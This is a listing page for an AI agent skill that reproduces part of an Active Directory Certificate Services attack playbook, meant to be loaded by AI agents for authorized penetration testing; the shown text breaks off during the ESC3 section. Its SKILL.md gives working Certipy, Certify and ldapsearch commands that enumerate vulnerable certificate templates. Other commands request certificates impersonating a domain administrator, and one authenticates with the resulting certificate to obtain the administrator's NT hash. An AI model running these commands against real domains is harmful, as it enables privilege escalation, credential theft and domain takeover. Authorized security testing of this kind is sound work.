Active Directory Certificate Services
Follow a structured AD CS escalation playbook (ESC1–ESC13) when assessing misconfigured certificate templates and enrollment endpoints.
Overview
Active-directory-certificate-services is an agent skill for the Ship phase that guides authorized AD CS testing across ESC1–ESC13, relay scenarios, and certificate-based persistence.
Install
npx skills add https://github.com/yaklang/hack-skills --skill active-directory-certificate-servicesWhat is this skill?
- ESC1 through ESC13 coverage with enrollment prerequisite chains
- Routes to ACL abuse, Kerberos, NTLM relay/coercion, and lateral-movement companion skills
- ADCS_ESC_MATRIX.md quick table with conditions, impact, and one-liner tool commands
- NTLM relay to HTTP enrollment (ESC8) and CA officer abuse patterns
- Detection indicators called out per technique in advanced reference
- Covers ESC1 through ESC13 in the expert playbook framing
- Companion matrix ADCS_ESC_MATRIX.md for per-ESC one-liners
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You face AD CS in scope but unstructured prompts skip enrollment chains and mix ESC conditions, producing unsafe or incomplete escalation paths.
Who is it for?
Security engineers and pentesters with written authorization testing AD CS in Enterprise Active Directory environments.
Skip if: Solo indie web developers without AD infrastructure, unauthorized targets, or teams seeking generic OWASP web checks only.
When should I use this skill?
Targeting misconfigured AD CS for authorized privilege escalation, template abuse, NTLM relay to enrollment, or certificate persistence.
What do I get? / Deliverables
You get a routed playbook with matrix-backed commands, cross-links to ACL, Kerberos, relay, and lateral skills, and clearer detection hooks per technique.
- ESC-scoped attack path narrative
- Matrix-backed command references
- Cross-skill routing list (ACL, Kerberos, relay, lateral movement)
Recommended Skills
Journey fit
Ship is the canonical phase for pre-release and engagement-style security hardening where misissued or relayed certificates become critical findings before production trust boundaries freeze. Security subphase matches privilege-escalation and persistence techniques against Active Directory Certificate Services called out in the description and routing block.
How it compares
Use instead of generic 'Active Directory hacking' prompts that do not enumerate ESC1–ESC13 prerequisites and companion-skill handoffs.
Common Questions / FAQ
Who is active-directory-certificate-services for?
Licensed assessors and defenders deepening AD CS attack literacy during structured engagements or purple-team exercises.
When should I use active-directory-certificate-services?
During Ship security reviews when certificate templates, HTTP enrollment, or CA roles are in scope and you need ESC-variant selection with relay and persistence context.
Is active-directory-certificate-services safe to install?
Treat it as offensive knowledge: read Prism Security Audits, enforce engagement rules of engagement, and never aim techniques at systems you do not own or lack explicit permission to test.
SKILL.md
READMESKILL.md - Active Directory Certificate Services
# SKILL: AD CS Attack Playbook — Expert Guide > **AI LOAD INSTRUCTION**: Expert AD CS (Active Directory Certificate Services) attack techniques. Covers ESC1 through ESC13, certificate-based persistence, NTLM relay to enrollment endpoints, and CA misconfigurations. Base models miss enrollment prerequisite chains and ESC condition combinations. ## 0. RELATED ROUTING Before going deep, consider loading: - [active-directory-acl-abuse](../active-directory-acl-abuse/SKILL.md) for ACL-based attacks that enable ESC4 (template modification) - [active-directory-kerberos-attacks](../active-directory-kerberos-attacks/SKILL.md) for Kerberos techniques after obtaining certificates - [ntlm-relay-coercion](../ntlm-relay-coercion/SKILL.md) for ESC8 (relay to HTTP enrollment endpoint) - [windows-lateral-movement](../windows-lateral-movement/SKILL.md) for using obtained certificates for lateral movement ### Advanced Reference Also load [ADCS_ESC_MATRIX.md](./ADCS_ESC_MATRIX.md) when you need: - ESC1–ESC13 quick reference table with conditions, impact, and tool commands - One-liner exploitation commands per ESC variant - Detection indicators per technique --- ## 1. AD CS ARCHITECTURE OVERVIEW ``` Certificate Authority (CA) │ ├── Enterprise CA (AD-integrated, issues certs based on templates) │ ├── Certificate Templates (define who can enroll, what EKUs, subject settings) │ ├── Enrollment endpoints: HTTP (certsrv), RPC, DCOM │ └── Published in AD: CN=Public Key Services,CN=Services,CN=Configuration │ ├── Template Key Settings: │ ├── Subject Alternative Name (SAN): who the cert represents │ ├── Extended Key Usage (EKU): what the cert allows │ ├── Enrollment permissions: who can request │ └── Issuance requirements: manager approval, authorized signatures │ └── Certificate → Kerberos Auth Flow: User presents cert → PKINIT → KDC verifies → issues TGT ``` --- ## 2. ENUMERATION ```bash # Certipy (recommended — comprehensive) certipy find -u user@domain.com -p password -dc-ip DC_IP -stdout certipy find -u user@domain.com -p password -dc-ip DC_IP -vulnerable -stdout # Certify (from Windows) Certify.exe find Certify.exe find /vulnerable Certify.exe cas # Enumerate CAs # Manual LDAP query for templates ldapsearch -H ldap://DC_IP -D "user@domain.com" -w password \ -b "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" \ "(objectClass=pKICertificateTemplate)" cn msPKI-Certificate-Name-Flag pKIExtendedKeyUsage ``` --- ## 3. ESC1 — ENROLLEE SUPPLIES SUBJECT **Condition**: Template allows enrollee to specify Subject Alternative Name (SAN) + client authentication EKU + low-privilege enrollment. ```bash # Certipy certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \ -template VulnTemplate -upn administrator@domain.com # Certify (Windows) Certify.exe request /ca:CA-NAME /template:VulnTemplate /altname:administrator # Authenticate with certificate certipy auth -pfx administrator.pfx -dc-ip DC_IP # → NT hash of administrator ``` --- ## 4. ESC2 — ANY PURPOSE EKU **Condition**: Template has "Any Purpose" EKU or no EKU (subordinate CA cert) + low-privilege enrollment. ```bash # Same as ESC1 exploitation certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \ -template AnyPurposeTemplate -upn administrator@domain.com ``` --- ## 5. ESC3 — ENROLLMENT AGENT **Condition**: Template allows enrollment agent certificate + another template allows enrollment on behalf of others. ```bash # Step 1: Request enrollment agent cert certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \ -template EnrollmentAgent # Step 2: Use enrollment